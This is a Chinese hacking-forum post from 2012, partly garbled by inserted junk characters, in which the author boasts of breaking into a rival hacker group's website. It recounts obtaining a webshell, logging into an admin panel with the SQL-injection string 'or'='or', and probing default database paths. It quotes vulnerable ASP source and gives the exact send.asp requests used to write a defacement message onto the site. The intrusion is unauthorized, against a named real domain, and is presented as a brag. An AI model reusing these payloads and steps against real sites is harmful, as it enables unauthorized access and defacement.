中国网络渗透测试联盟

标题: 入侵华东黑客联盟装X的过程 [打印本页]

---

作者: admin    时间: 2012-11-6 21:06
标题: 入侵华东黑客联盟装X的过程
有些朋友对我和云中鹰搞华东的过程比较感兴趣，其实那个很没技术含量
( M/ p# w* P$ s2 V% X今天闲着无聊，把手上的项目葛一下，来论坛放松一下，顺便说说上次搞华东黑客联盟到装B的过程
这天云中鸡说华东的某人很牛X，利用JPG黑站大法把恶灵战队黑了，还发了个demo出来
我去看了一下demo，感觉很黑客，于是就和云中鸡搞了一下华东
+ h& n2 a9 g: [- [3 G首先，我记得华东只被人搞过一次（记性不好，原谅下~~），所以应该防护还是比较好的
3 P/ v1 H  i  I5 o  `( l服务器应该防ARP，不过这还只是猜测
云中鸡说先不搞C段，PZ一下再说
然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]
一看，我晕，怎么网站变了................以前我比较喜欢到华东去看动画，现在怎么变成这鸟样了，晕..............
$ j8 {2 Q6 H- I; E4 j这时候云中鸡丢了一个同F的站过来，说进了后台搞不了shell
我看了下搞到了一个webshell出来（这里涉及点技巧，不过不是重点，故省略....），登上webshell后发现服务器的权限很BT
然后我就把shell丢给云中鸡去提权，过了一会儿找到了一个二级玉米的站shop.xiahack.cn
4 R4 B+ J0 |  _! K看着是用eshop来架设的网店，虽然不是同F，但还是想搞下他看有什么可利用的地方，用了几个0day去搞发现不是最新版，0day用不鸟
9 `" Y- m% f/ w# T& c: Y6 Z: r问了下云中鸡提权怎样了，他说还在努力，装不鸟B就不睡觉，晕了，这下入侵陷入了僵局...............
无聊到网上乱逛，这时无意中发现一个阿拉伯XXXXXX，具体就不说啥鸟，呵呵~~
7 ~5 A) G: T" d- M然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑，于是我就去看看是什么
; O# s0 ?1 I7 F打开一看，如图1所示。

http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg
2 b( K, _3 a: h0 @" q: C. E我靠~~这啥东西？这么帅？点进去一看，如图2所示。
" D1 ]% ?0 \( H6 J0 H! {
+ r7 F$ ?4 D* j8 {- o7 L6 c. } http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg
- G7 z  m( q' Q( v( Y5 M太帅了，真YD！！
- [1 H( M& e2 b9 q& W" k这个页面应该是一套个人主页程序，而且还挺炫的！
这个页面有发表日志的地方，应该可能存在登陆页面，找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面，如图3所示。
4 G9 c- ^0 q- k' A
& L! D' d( |$ r, n* z0 H9 A5 r http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg
, X$ Q, I+ f4 F4 A$ H1 |嘿嘿，试着'or'='or'居然进去了！！如图4所示。

' y1 m0 i( N" V: c- R1 l http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg
* \0 `* v0 p; @6 H" @( W9 G4 B; x经过半个多小时的摸索，还是没有发现可利用的地方。
这下郁闷了，不管了，把这套程序下载下来看看吧
找了一会才知道这套程序叫做“V时代个人flash主页”
& o# e1 ^" a: p' M6 l2 C% [到官方下了套最新版，然后找了一下可利用的地方，不一会，我发现“/html/admin”这个目录很可能可以利用
; h3 K' p5 C* ^4 |. ]' @* h于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]
返回的确实找不到页面，郁闷了，输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]
同样是找不到页面，真晕！再看看！
  G8 _6 Y. I2 e1 H5 ?3 t7 f7 a5分钟过后，我发现后台地址是“/asp”，默认数据库是“/asp/vshidai.mdb”，嘿嘿！这下你不死定了！
马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]]，我晕！服务器居然设置了mdb后缀映射，下载不了！
打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]]，发现返回空白，这下我真是服了！
1 S+ Y: d) h2 \' n希望快覆灭了，这时我点到了根目录下的send.asp文件，看到里面存在着一个有意思的东西，代码如下：
9 t7 \/ }; ~0 v1 q8 U1 p
- N. K, X. ~! n, P# O% Zvar a
+ `8 ~/ K: T! s0 q% z" ~* N: Lvar b
' O1 N+ l: T/ j3 y1 }$ N4 d8 I3 O! Nvar tx
/ D/ u" B3 u" k8 g: D( yvar clean
a=Request("re")
4 h) U+ @& w0 u$ h" Kclean=Request("clean")
var jian="test.txt"

if(clean==1){
" ?" v# |* V/ u  d. U% D- B" vtx="&a="
var fs2
+ x% W7 y) n: }5 K3 I% Z4 qvar fs2=Server.CreateObject("Scripting.FileSystemObject")
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
newdt.WriteLine("&a=")
4 ]' d" I) S5 v6 F' i9 A2 Dnewdt.close()
}
* b' F- Z7 u/ ?/ C; i
if(clean==0|clean==1){
tx=""
& t2 x) H3 m7 _4 V; j9 Fvar fso = Server.Createobject("Scripting.FileSystemObject")
- h+ D% l' a# X* W) ~. Xvar file = fso.OpenTextFile(Server.Mappath(jian))
' c( ~7 x3 r2 W7 X, Q" bwhile (!file.AtEndOfStream){
* C, g$ z# |* m7 _tx=file.ReadLine()
Response.write (tx)
7 @# ~, r& ~2 z}
Response.write ("&")
9 r! ^. d+ i4 w0 I/ S* B9 Ufile.close()
% m" N" i! }& g5 h}

2 v6 J+ v; o$ P! ?* a% V' A  hif(clean==2){
6 |' N# z3 ]8 Y( J" z/ I! ztx=""
var fso = Server.Createobject("Scripting.FileSystemObject")
var file = fso.OpenTextFile(Server.Mappath(jian))

% p; K6 I9 h' v- {) F+ ~var fs2
2 M& ?/ B) i) `+ Zvar fs2=Server.CreateObject("Scripting.FileSystemObject")
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)

6 U: ~9 y' [1 m4 A$ N
- J6 n, ?' U% u$ H/ |0 }while (!file.AtEndOfStream){
tx=file.ReadLine()
Response.write (tx)}
2 D. s% _) s: T' C1 y; q9 f
Response.write (a+"&")
newdt.WriteLine(a)
) W- W$ {6 Q% S. {+ l$ H
9 k6 |4 a8 W; p' E& N) f4 O* S. J0 Tfile.close()
0 u5 W" e! Z% |% `6 A2 U; b4 f: a. jnewdt.close()
4 K7 }/ i/ h& M1 U& _( g}

& F8 x3 g* \- Y
6 C/ k0 Z8 N/ O. r! I复制代码
这下应该可以装B了！从代码看出，我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件，文件里面写着“&a=&”
' s, i9 Q# g5 ^2 R1 \接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
2 V8 t7 b9 J; o+ @1 |( d1 g这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
过程如图5、6所示。

http://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg
  
* B5 Y& c! c( _/ {  f http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg
, r# h) I/ M9 N  N& J3 U- C提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看，如图7所示。

* I! L3 k0 j3 G( L9 | http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg
" K/ ?: p. i! D  x这下终于可以装到X了，如果不是V时代的作者写的send.asp代码存在问题，拿到shell是不难的
8 C/ t0 ~% O+ K2 Q- u: |如果jian是经过request取值的话，同样也能搞到shell。
这次只是装到了X，并没有拿到shell
已经是凌晨了，跟云中J说了声就睡觉去鸟
估计那B可能搞到了权限，不过我没问他，最近事情比较多，也比较忙
就到这里吧，没技术含量，纯粹装X，高手们见笑了
另外劝告某些认为上传个JPG就能黑到站的大黑客，你这样自欺欺人吃亏的是你自己
自己学不到技术，却还在自欺欺人
不说了，本文到这里，最后感谢一下阿拉伯黑客，原来阿拉伯黑客也是很强大的，好了，猪大家愉快~~

8 \  {1 M4 g: @

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2